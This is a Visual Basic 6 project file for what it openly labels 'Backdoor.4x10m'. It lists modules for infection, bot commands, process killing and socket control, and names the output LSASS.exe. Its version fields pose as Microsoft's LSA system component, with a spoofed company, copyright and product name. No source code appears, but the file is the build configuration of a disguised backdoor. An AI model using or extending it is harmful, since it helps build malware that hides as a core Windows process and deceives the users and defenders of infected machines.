Type=Exe
Form=frm\frmMain.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\DEV\System32\stdole2.tlb#OLE Automation
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX
Class=clsKillProcess; cls\clsKillProcess.cls
Module=modLoadClass; bas\modLoadClass.bas
Class=CSysInfo; cls\CSysInfo.cls
Class=clsBotSettings; cls\clsBotSettings.cls
Class=clsBotCommands; cls\clsBotCommands.cls
Module=modPublic; bas\modPublic.bas
Class=clsInfect; cls\clsInfect.cls
Class=clsNetInfo; cls\clsNetInfo.cls
Module=modHelpSystem; bas\modHelpSystem.bas
Class=clsSocketControl; cls\clsSocketControl.cls
IconForm="frmMain"
Startup="frmMain"
HelpFile=""
Title="LSASS"
ExeName32="LSASS.exe"
Command32=""
Name="LSASS"
HelpContextID="0"
Description="LSA Executable and Server DLL (Export Version)"
CompatibleMode="0"
MajorVer=1
MinorVer=2
RevisionVer=5
AutoIncrementVer=1
ServerSupportFiles=0
VersionComments="Backdoor.4x10m"
VersionCompanyName="Microsoft Corporation"
VersionFileDescription="LSA Executable and Server DLL (Export Version)"
VersionLegalCopyright="Copyright (C) Microsoft Corp. 1981-1999"
VersionLegalTrademarks="Backdoor.4x10m"
VersionProductName="Microsoft(R) Windows (R) 2000 Operating System"
CompilationType=0
OptimizationType=1
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=-1
OverflowCheck=-1
FlPointCheck=-1
FDIVCheck=0
UnroundedFP=-1
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
